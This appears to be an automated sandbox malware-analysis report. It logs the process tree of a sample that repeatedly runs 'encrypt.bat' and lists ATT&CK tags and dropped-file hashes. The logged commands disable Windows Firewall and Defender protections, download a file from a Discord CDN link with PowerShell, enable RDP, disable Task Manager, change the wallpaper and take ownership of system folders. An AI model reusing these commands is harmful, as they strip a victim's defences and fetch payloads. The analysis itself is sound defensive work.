C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off24⤵
- Modifies Windows Firewall
PID:4796 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off24⤵PID:2436
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off24⤵
- Modifies Windows Firewall
PID:4144 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off24⤵
- Modifies Windows Firewall
PID:2700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:1420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:3996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:1800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:4704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:4108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"24⤵
- Blocklisted process makes network request
PID:1300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"24⤵PID:4356
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"25⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"26⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f26⤵PID:4164
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"26⤵PID:1856
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f26⤵PID:1832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:3860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:5072
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:2948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2384
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable26⤵PID:4012
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE26⤵PID:508
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off26⤵
- Modifies Windows Firewall
PID:3340 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off26⤵
- Modifies Windows Firewall
PID:4916 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off26⤵
- Modifies Windows Firewall
PID:4016 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off26⤵PID:3784
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off26⤵
- Modifies Windows Firewall
PID:1788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"26⤵PID:996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:4640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:2640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:1440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"26⤵
- Blocklisted process makes network request
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"26⤵PID:3816
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"27⤵PID:3428
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"28⤵PID:3552
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f28⤵PID:3520
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"28⤵PID:2052
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f28⤵PID:1492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:4264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:4256
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable28⤵
- Modifies Windows Firewall
PID:2592 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE28⤵
- Modifies Windows Firewall
PID:2112 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off28⤵
- Modifies Windows Firewall
PID:1232 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off28⤵
- Modifies Windows Firewall
PID:1300 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off28⤵
- Modifies Windows Firewall
PID:676 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off28⤵
- Modifies Windows Firewall
PID:4148 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off28⤵
- Modifies Windows Firewall
PID:2452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:1044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:4728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:1420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:4312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"28⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"28⤵PID:5084
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"29⤵PID:1236
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"30⤵PID:1304
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f30⤵PID:3600
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"30⤵PID:3816
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f30⤵PID:3540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:5048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:1336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:2800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:4684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:3532 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable30⤵
- Modifies Windows Firewall
PID:3076 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE30⤵
- Modifies Windows Firewall
PID:4608 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off30⤵
- Modifies Windows Firewall
PID:616 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off30⤵
- Modifies Windows Firewall
PID:4344 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off30⤵
- Modifies Windows Firewall
PID:4204 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off30⤵
- Modifies Windows Firewall
PID:3688 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off30⤵PID:2700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:1416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:1968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:3520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:2896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"30⤵
- Blocklisted process makes network request
PID:1588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"30⤵PID:2940
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"31⤵PID:216
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"32⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f32⤵PID:676
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"32⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f32⤵PID:3616
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:1856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:3208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:4140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:4996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:2940 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable32⤵PID:2932
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE32⤵
- Modifies Windows Firewall
PID:3996 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off32⤵PID:4380
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off32⤵
- Modifies Windows Firewall
PID:3948 -
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f30⤵
- Sets desktop wallpaper using registry
PID:3540 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters30⤵PID:3704
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f28⤵
- Sets desktop wallpaper using registry
PID:3704 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters28⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f26⤵
- Sets desktop wallpaper using registry
PID:3348 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters26⤵PID:4972
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f24⤵
- Sets desktop wallpaper using registry
PID:1440 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters24⤵PID:1148
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f22⤵
- Sets desktop wallpaper using registry
PID:1100 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters22⤵PID:3948
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f20⤵
- Sets desktop wallpaper using registry
PID:2792 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters20⤵PID:4312
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f18⤵
- Sets desktop wallpaper using registry
PID:992 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters18⤵PID:4108
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f16⤵
- Sets desktop wallpaper using registry
PID:3948 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters16⤵PID:4964
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f14⤵
- Sets desktop wallpaper using registry
PID:3344 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters14⤵PID:5040
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f12⤵
- Sets desktop wallpaper using registry
PID:2276 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters12⤵PID:4380
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f10⤵
- Sets desktop wallpaper using registry
PID:1856 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters10⤵PID:2320
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f8⤵
- Sets desktop wallpaper using registry
PID:4344 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters8⤵PID:640
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f6⤵
- Sets desktop wallpaper using registry
PID:4240 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters6⤵PID:2320
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f4⤵
- Sets desktop wallpaper using registry
PID:4796 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2640
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2756
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2728
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:368
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5068
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4396
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1208
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s fdPHost1⤵PID:3664
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵PID:2868
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3024
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
- Modifies termsrv.dll
PID:4328 -
C:\Windows\system32\takeown.exetakeown /f /im C:\Windows\System32 /r /d Y2⤵
- Modifies file permissions
PID:4916 -
C:\Windows\system32\takeown.exetakeown /f /im C:\Windows\System322⤵
- Modifies file permissions
PID:148 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32 /r /d Y2⤵
- Modifies file permissions
PID:656
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:376
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:1100
-
C:\Windows\system32\takeown.exetakeown /f /im C:\Windows\SysWoW64 /r /d Y2⤵
- Modifies file permissions
PID:588 -
C:\Windows\system32\takeown.exetakeown /?2⤵
- Modifies file permissions
PID:2324
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
PID:4820 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\Syswow64 /r /d Y2⤵
- Modifies file permissions
PID:3428
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Manipulates Digital Signatures
- Modifies Installed Components in the registry
- Registers new Print Monitor
- Modifies system executable filetype association
- Registers COM server for autorun
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:2204
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:988
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵PID:4576
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:3628
-
C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"1⤵PID:4640
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeOfficeC2RClient.exe /error PID=4640 ProcessName="Microsoft Excel" UIType=0 ErrorSource=0x0 ErrorCode=0xe ShowUI=12⤵
- Process spawned unexpected child process
PID:1208
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:2864
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Runs regedit.exe
PID:3616
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4Registry Run Keys / Startup Folder
4Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Boot or Logon Autostart Execution
4Registry Run Keys / Startup Folder
4Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Encrypt\encrypt.batFilesize
2KB
MD5e678740f3d7186df8911224ea11f35f1
SHA1f01a152d4388c856e14819f2b9d36db67cb1d22e
SHA256181f77f261d2a8ba55f2926ac9997b8a95d3068ec32afa60465cb9b98e08435a
SHA5126d1ee7e000a60f1618264a10279ae186d1a03e98143b1e3090a656b8cc8205c28db0caf0b31f4584c72570b9a322187a8554e66e9c564d1ab66bcfdb4a32fec9
-
C:\Encrypt\encrypt.htmlFilesize
1KB
MD560722a327960e4b4f5d967101a72ed06
SHA104109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA2563441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA51298812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OHP8MVFQ\edgecompatviewlist[1].xmlFilesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aeb197f0f2bcd56fe9a5f7e77460e87d
SHA15c84dc762be4bc1ff6fdc0afeb29ac82069086f0
SHA25629e0ec875f9db98101c0911b5db43b451391714a08b7d0d60593aec0ad203145
SHA512de6dcc9107f347420ab4a3eae84a1e0ed233ec6aee69c22611931f9ac42c7a10a4f8350434bbf87a5b9df4837546cec73a4b6db5f04ed75a0599e7e767ee922a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD539758f695b9440cff4cd90243a5c54c0
SHA1bdc25b5666f28b5e5d54765f689c95b790dc04aa
SHA256ac07c8591fc8594fc7c51fd7fe0cb5b2cda6287fb061daecb591e4a4c45dd674
SHA512ebb8550d95e8a4e8400a595209361872d3f8f85e826a0b63d8aab5c19a0e9f03e4121a8633b398f3c3a9ea0f08eac0bf26288e8987b78602648d20e1d6cbe244
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58a8b7580ddcf9f26ed879b1d9fb9b439
